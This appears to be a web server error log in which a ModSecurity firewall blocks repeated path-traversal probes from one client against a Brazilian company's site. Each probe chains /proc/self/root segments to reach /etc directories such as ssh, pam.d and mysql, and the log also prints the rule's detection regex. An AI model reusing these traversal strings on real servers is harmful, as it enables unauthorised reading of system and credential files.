[Fri Mar 20 07:17:34.338211 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:45660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0evl1pVZ5mVmJwsFMmbAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:34.973796 2026] [mime_magic:error] [pid 21219:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:44952] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:17:35.654833 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:45662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ev_HIg5MgXLBnicPvgwAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:37.110854 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:45666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ewRCii7xarUs8iHZe3gAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:38.563496 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:45680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ewvXLqtnMIWvjpaKRRgAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:43.057932 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:45680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ex_XLqtnMIWvjpaKRUAAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:44.407781 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:60074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eyOoXxyEfFpUF8f94gAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:45.830704 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:60088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eyTJ3M9BSuKP7CAYRzQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:49.501505 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:60092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ezQF0L0L-SsrnPo5fawAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:52.083050 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:53832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e0Na6ubjKNq_cu4bLSgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:53.423724 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.243.128:53840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e0bninkcc-iUj5ApWQwAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:56.256543 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:53848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e1OoXxyEfFpUF8f94jgAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:17:57.535426 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:53864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e1fXLqtnMIWvjpaKRWQAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:18:01.028069 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.243.128:53872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e2QF0L0L-SsrnPo5fegAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:18:03.353320 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.243.128:51334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e2_qxLDW4GITHUkTdbQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:18:09.020730 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.243.128:51350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e4QF0L0L-SsrnPo5fgAAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:18:13.032096 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:39780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e4-oXxyEfFpUF8f94lwAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:18:16.153981 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:39782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e6Na6ubjKNq_cu4bLYQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:18:18.901870 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:39786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e6vXLqtnMIWvjpaKRbwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:18:20.329777 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:41086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e7BCii7xarUs8iHZfAAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:18:25.662014 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:41088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e8fHIg5MgXLBnicPvzgAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:18:27.118577 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:41104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0e811pVZ5mVmJwsFMm0gAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
